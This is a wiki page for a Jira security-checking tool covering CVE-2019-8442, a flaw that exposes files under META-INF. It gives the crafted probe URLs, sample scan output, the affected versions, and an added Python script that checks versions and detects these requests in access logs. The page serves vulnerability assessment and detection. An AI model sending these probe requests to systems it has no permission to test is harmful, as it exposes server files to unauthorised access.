CVE‐2019‐8442 - carnal0wnage/J-PWN GitHub Wiki
CVE-2019-8442
Category: [Info Disclosure]
[CG] I haven't found any interesting info in any of these pom.xml files but YMMV
module name: check_cve_2019_8442
url:
/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
INFO: Checking for CVE-2019-8442
- Checking URL: https://jiraserver/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
- HTTP Status Code: 200
- Checking URL: https://jiraserver/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
- HTTP Status Code: 200
- Checking URL: https://jiraserver/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
- HTTP Status Code: 200
- NEEDS MANUAL REVIEW - No sensitive information detected at https://jiraserver/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
References: https://jira.atlassian.com/browse/JRASERVER-69241
Description
The CachingResourceDownloadRewriteRule class in Jira
- before version 7.13.4
- and from version 8.0.0 before version 8.0.4
- and from version 8.1.0 before version 8.1.1
allows remote attackers to access files in the Jira webroot under the META-INF directory via a lax path access check.
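For defenders triaging this issue, the following is an added example (not part of J-PWN or the original page). It checks a Jira version against the affected ranges listed above and flags access-log requests of the `/s/<anything>/_/META-INF/` shape. The function names, the sample log lines and the combined log format are assumptions.

```python
import re
from urllib.parse import unquote

# Affected ranges from the description, as (first affected, first fixed).
AFFECTED = [((0, 0, 0), (7, 13, 4)), ((8, 0, 0), (8, 0, 4)), ((8, 1, 0), (8, 1, 1))]
# Request shape listed under "url:": /s/<any segment>/_/META-INF/...
META_INF = re.compile(r"^/s/[^/]+/_/META-INF/", re.IGNORECASE)
# Assumed combined log format: "METHOD path HTTP/x.y" status
LOG_LINE = re.compile(r'"(?:GET|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample access-log lines (documentation IP range, invented timestamps).
P = "/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/"
SAMPLE_LOG = [
    f'192.0.2.10 - - [01/Jan/2020:10:00:00 +0000] "GET /s/thiscanbeanythingyouwant/_{P}pom.xml HTTP/1.1" 200 5120',
    f'192.0.2.10 - - [01/Jan/2020:10:00:01 +0000] "GET /s/x/_{P}pom.properties HTTP/1.1" 404 312',
    '192.0.2.22 - - [01/Jan/2020:10:00:02 +0000] "GET /s/abc/_/download/batch/app.js HTTP/1.1" 200 900',
    '192.0.2.10 - - [01/Jan/2020:10:00:03 +0000] "GET /s/x/_/%4DETA-INF/maven/com.atlassian.jira/'
    'atlassian-jira-webapp/pom.properties?a=1 HTTP/1.1" 200 140',
]


def is_affected(version: str) -> bool:
    """True if a Jira version string falls inside one of the affected ranges."""
    parts = [int(p) for p in re.findall(r"\d+", version)[:3]]
    if not parts:
        raise ValueError(f"no version number in {version!r}")
    v = tuple(parts + [0] * (3 - len(parts)))  # pad "7.13" to (7, 13, 0)
    return any(lo <= v < hi for lo, hi in AFFECTED)


def meta_inf_hits(lines):
    """Return (decoded path, status) for requests that target META-INF via /s/.../_/."""
    hits = []
    for line in lines:
        m = LOG_LINE.search(line)
        if not m:
            continue
        # Drop the query string first, then percent-decode so %4DETA-INF is caught.
        path = unquote(m.group(1).split("?", 1)[0])
        if META_INF.match(path):
            hits.append((path, int(m.group(2))))
    return hits


if __name__ == "__main__":
    for path, status in meta_inf_hits(SAMPLE_LOG):
        print("SERVED " if status == 200 else "blocked", status, path)
```

A 200 on one of these paths means the file was served and the instance should be checked against the fixed versions; other status codes indicate probing that did not return content.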